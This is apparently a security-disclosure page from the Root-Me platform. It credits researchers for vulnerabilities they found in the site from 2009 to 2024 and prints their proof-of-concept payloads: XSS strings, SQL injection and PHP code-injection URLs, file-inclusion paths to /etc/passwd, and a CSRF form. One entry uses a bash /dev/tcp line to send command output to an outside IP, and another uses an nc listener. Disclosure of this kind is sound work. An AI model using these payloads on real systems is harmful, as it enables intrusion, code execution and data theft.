Discovered Weaknesses

As on any information system, some weaknesses were identified on the website.

07/02/2024 Nishacid

Has identified a stored XSS vulnerability in translations, allowing a member of the association to modify any of the site’s translations with JavaScript code by using :

<img src=xx onerror=confirm(document.domain)>

22/11/2023 Laluka

Has identified a stored XSS (through file upload) to RCE via code injection on the mediabox configuration. PHP code is reflected (json_dump) and then evaluated; the targeted account must be webmestre.

const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');

const formData = new FormData(form);

formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);

14/07/2023 Elweth

Detected a vulnerability in the version of Chrome Headless that bots use for Web-Client challenges. The version in question was vulnerable to CVE-2021-21224, which could lead to code execution in the bot’s environment.

27/08/2022 Laluka

Has identified a vulnerability where changing the status of the site’s content (doc, challenge, post, ...) to a higher level (e.g. from draft to evaluation or from trash to writing) triggers an email to be sent to the challenge author and/or webmaster. Some variables such as the title and content are not properly encoded or escaped before being passed to the eval function which renders the email. This allowed for a Blind-RCE to occur with a payload such as <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?> in the title or content of the article.

send(eval($email));

21/07/2022 Abyss Watcher & SpawnZii

have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

11/07/2022 Abyss Watcher

identified a stored XSS vulnerability exploitable with an iframe hosted on RM domain :

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain starting with www.root-me.org :

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identified a vulnerability allowing a member of the association to elevate his role to administrator simply by using the private interface of SPIP.

01/10/2021 Podalirius

identified a vulnerability allowing access to documents attached to solutions without restrictions :

<imgXX>

15/05/2020 Laluka

identified multiples vulnerabilities : 3 reflected XSS, 2 SQLi and 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E

https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>

https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--

/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-

https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/

04/06/2019 warlock

identified an XSS vulnerability. This one required a user intervention on the chatbox (a click on the previous page).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 warlock

has identified a vulnerability allowing to kill, with an unprivileged user, the database available on the challenge01 server which hosts several challenges, by saturating the memory in a particular way in order to kill the process of his choice. This allowed to restart another binary instead listening on the same port via a race condition.

16/11/2018 Hacqueen

identified a vulnerability allowing to trap the users of the store through an iframe via a spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro), the lang parameter was not filtered correctly.

12/04/2018 DrStache & urandom

identified a stored XSS vulnerability in the OSM map in the CTFATD rooms by injecting the following payload into the user’s bio (https://www.root-me.org/?page=preferences&lang=en)

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

has identified an "Insecure Direct Object Reference" vulnerability allowing to read any private message :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing it to access the file system with ssh and to execute commands.

03/2015 WtF

has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allows it to read files from other challenges.

15/06/2013 LouTerrailloune

has identified a PHP code injection vulnerability on the "code - decode" page:

Text to decode in base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

found several stored XSS in the user profile management :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

found a LFI in a challenge :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page :

Text to decode in base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

found a insecure indirect object references which lead to unauthorized access to all PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

found a stored XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

found a CSRF on the chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">

<input type=hidden name="ON" value="1">

<input type=hidden name="message" value="0wn3d !">

</form>

15/02/2011 EsSandre

found a LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

02/12/2009 real

found a code injection vulnerability :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'